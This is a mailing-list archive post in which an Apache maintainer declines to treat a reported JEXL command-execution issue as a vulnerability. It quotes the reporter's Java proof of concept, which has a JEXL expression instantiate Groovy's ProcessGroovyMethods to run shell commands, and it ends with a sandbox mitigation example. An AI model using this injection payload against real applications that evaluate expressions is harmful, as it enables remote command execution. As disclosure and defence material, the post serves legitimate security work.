commons-dev mailing list archives

From Mark Thomas <ma...@apache.org>
Subject Re: CVE request for : Apache Commons JEXL Expression Execute Command Vulnerability through groovy.
Date Mon, 24 Apr 2017 16:29:59 GMT
The Apache Commons project will not be treating this as a security
vulnerability. Executing untrusted / unsanitized / unvalidated code in a
scripting environment is always dangerous.

Progress may be followed via:
https://issues.apache.org/jira/browse/JEXL-223

Mark


On 21/04/17 08:52, Cloudsecintel wrote:
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through
> groovy.
> 
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
> 
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> 
> public class elExp {
>     public static void main(String args[]) throws IOException {
>         // Create or retrieve an engine
>         JexlEngine jexl = new JexlBuilder().create();
>         // Create an expression
>         //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
>         ProcessGroovyMethods n = new ProcessGroovyMethods();
>         System.out.println(n.execute("id").toString());
>         String jexlExp =
>             "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
>         JexlExpression e = jexl.createExpression( jexlExp );
>         try {
>             Process process = new ProcessBuilder("id").start();
>         } catch (IOException e1) {
>             // TODO Auto-generated catch block
>             e1.printStackTrace();
>         }
>         // Create a context and add data
>         JexlContext jc = new MapContext();
>         jc.set("foo", jexlExp );
> 
>         // Now evaluate the expression, getting the result
>         Object o = e.evaluate(jc);
>         System.out.println(o);
>     }
> }
> {code}
> 
> Sent from ProtonMail <https://protonmail.com>, Swiss-based encrypted email.
> 
> 
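Added example (not part of Mark's reply or of the original report): the mitigation the answer points at. The report's engine is built with `new JexlBuilder().create()`, which lets an expression instantiate any class on the classpath via `new(...)`; a deny-by-default `JexlSandbox` limits `new(...)` and method calls to classes that were explicitly allowed. JEXL 3.x is assumed; the class `SandboxedJexl`, the helpers `safeEngine` and `tryEval`, and the sample expressions are mine.

```java
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

public class SandboxedJexl {

    /** Engine whose introspection is deny-by-default: only listed classes are reachable. */
    static JexlEngine safeEngine() {
        // false = every class is blocked unless it is allowed below
        JexlSandbox sandbox = new JexlSandbox(false);
        // Allow java.lang.String completely (constructor, properties, methods)
        sandbox.white("java.lang.String");
        return new JexlBuilder()
                .sandbox(sandbox)
                .strict(true)   // unresolvable constructors/methods are errors, not nulls
                .silent(false)  // those errors are thrown instead of being logged away
                .create();
    }

    /** Evaluates one expression; returns its result, or the JexlException that refused it. */
    static Object tryEval(JexlEngine jexl, String expression) {
        JexlContext ctx = new MapContext();
        try {
            return jexl.createExpression(expression).evaluate(ctx);
        } catch (JexlException ex) {
            return ex;
        }
    }

    public static void main(String[] args) {
        JexlEngine jexl = safeEngine();
        // Allowed: String is on the allow-list, so new() succeeds and the method call runs
        System.out.println(tryEval(jexl, "new(\"java.lang.String\", \"hello\").toUpperCase()"));
        // Blocked: java.io.File was never allowed, so the sandbox returns no constructor
        System.out.println(tryEval(jexl, "new(\"java.io.File\", \"/tmp\")"));
        // Blocked: the Groovy runtime class from the report is not on the list either
        System.out.println(tryEval(jexl, "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\")"));
    }
}
```

The sandbox only narrows what scripts may reach; input that is untrusted still should not be handed to the engine at all, which is the point of the reply above. Later JEXL releases (3.3 and up) additionally ship `JexlPermissions`, selectable via `JexlBuilder.permissions(...)`, for the same purpose.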

